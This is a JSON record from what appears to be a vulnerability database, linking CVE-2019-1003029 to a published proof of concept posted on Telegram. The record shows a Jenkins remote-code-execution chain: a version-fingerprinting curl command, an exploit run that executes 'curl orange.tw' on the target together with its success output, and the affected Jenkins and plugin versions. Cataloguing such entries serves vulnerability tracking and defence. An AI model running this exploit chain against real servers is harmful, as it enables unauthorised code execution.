{"uuid": "05b42c3d-9a2b-4c55-8114-e2d487a9d149", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2019-1003029", "type": "published-proof-of-concept", "source": "https://t.me/netrunnerz/438", "content": "Jenkins RCE 2019\nCVE-2018-1000861\nCVE-2019-1003005\nCVE-2019-1003029\n\n\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435:\n$ curl -s -I http://jenkins/| grep X-Jenkins\nX-Jenkins: 2.137\nX-Jenkins-Session: 20f72c2e\nX-Jenkins-CLI-Port: 50000\nX-Jenkins-CLI2-Port: 50000\n\n$ python exp.py http://jenkins/ 'curl orange.tw'\n[*] ANONYMOUS_READ disable!\n[*] Bypass with CVE-2018-1000861!\n[*] Exploit success!(it should be :P)\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438:\nJenkins 2.53\nJenkins 2.122\nJenkins 2.137\nJenkins 2.138 with ANONYMOUS_READ enable\nJenkins 2.152 with ANONYMOUS_READ enable\nJenkins 2.153 with ANONYMOUS_READ enable\nScript Security Plugin 1.43\nScript Security Plugin 1.48", "creation_timestamp": "2023-04-06T10:40:22.000000Z"}